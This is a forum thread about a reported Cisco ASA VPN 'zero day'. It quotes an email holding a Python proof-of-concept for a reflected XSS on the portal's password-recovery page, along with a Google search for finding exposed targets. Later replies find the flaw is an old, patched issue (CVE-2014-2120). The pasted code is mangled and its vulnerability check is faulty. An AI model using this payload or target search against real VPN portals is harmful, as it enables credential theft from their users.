zero day exployt for ASAs, the fun aint over yet

[dlots]

So my company blocks this page so I can't check it out much, but this is the email that was forwarded to me

Subject: [FD] Cisco ASA VPN - Zero Day Exploit
Message-ID:
   <CANYkwVJZ7B8tzM5t8KWRV+zCnb65JY0+TKV7VYQ4XSBRPcLvQw@mail.gmail.com>
Content-Type: text/plain; charset=UTF-8

# Exploit author: Juan Sacco - jsacco@exploitpack.com # Affected program: Cisco ASA VPN Portal - Zero Day # Cisco ASA VPN is prone to a XSS on the password recovery page.
# This vulnerability can be used by an attacker to capture other user's credentials.
# The password recovery form fails to filter properly the hidden inputs fields.
#
# This Zero Day exploit has been developed and discovered by Juan Sacco.
# Exploit Pack - Team http://exploitpack.com # # Release Dates:
# Reported to Cisco PSIRT Feb 4/2016
# Cisco Dev Team working on a fix Feb 15/2016 # Cisco PSIRT report a CVE Feb 15/2016 # Exploit Pack disclose the bug Feb 15/2016 # Disclosure of the Exploit Feb 16/2016 # # Look for vulnerable targets here:
https://www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F
# More than 18.000 results in Google only

import string, sys
import socket, httplib
import telnetlib

def run():
   try:
    Target = sys.argv[1]
Port = int(sys.argv[2])
# Here goes your custom JS agent code
Payload = "alert(1)"
VulnerableURL =
"/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d"
+ Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_"
CraftedRequest = VulnerableURL
  # Start the connection
connection = httplib.HTTPSConnection(Target) connection.request('GET', CraftedRequest) Response = connection.getresponse() print "Server status response:", Response.status, Response.reason data =  Response.read() vulnerable = "Target is not vulnerable"
for line in str(data).splitlines():
if "juansacco\\\"" in line:
vulnerable = "Targer is vulnerable"
if vulnerable != "Not vulnerable":
print "Result of the test:", vulnerable
# Find the injection on the response
connection.close()
   except Exception,e:
     print "Exploit connection closed " + str(e)

if __name__ == '__main__':
   print "Cisco VPN ASA Exploit - Zero Day"
   print "################################"
   print "Author: Juan Sacco - jsacco@exploitpack.com"

   try:
     Target = sys.argv[1]
     Port = sys.argv[2]
   except IndexError:
     pass
run()

[deanwebb]

Paaaaaaaaaaaaaaaaaaaatch those ASAs running VPNs!

[dlots]

It's a Zero day, I don't think there is a patch yet :-(

[dlots]

Apparently this isn't really a 0 day, it's from 2014  or so.

[Otanx]

Probably this one from 2013 - https://tools.cisco.com/security/center/viewAlert.x?alertId=30214

Juan Sacco is a pretty good researcher. Done some talks at big conferences so I wonder what is going on  here. If it was a new XSS that is a 0day I would expect to see more coverage about it.

-Otanx

[icecream-guy]

search on "Cisco PSIRT Feb 4/2016"

fist link is here
https://securityintelligence.com/news/danger-on-the-perimeter-about-the-cisco-asa-vulnerability/

click on the Cisco ASA Alert in that page and the reference is

Cisco ASA Software IKEv1 and IKEv2 Buffer Overflow Vulnerability

so my quick google yields results that we've known about for a few days.

I could be wrong though.

Hitting up AS now..

[icecream-guy]

Hitting up AS now..

This is not a new vulnerability. It was fixed and previously disclosed in 2014 and is just assigned CVE CVE-2014-2120:

https://tools.cisco.com/security/center/viewAlert.x?alertId=33406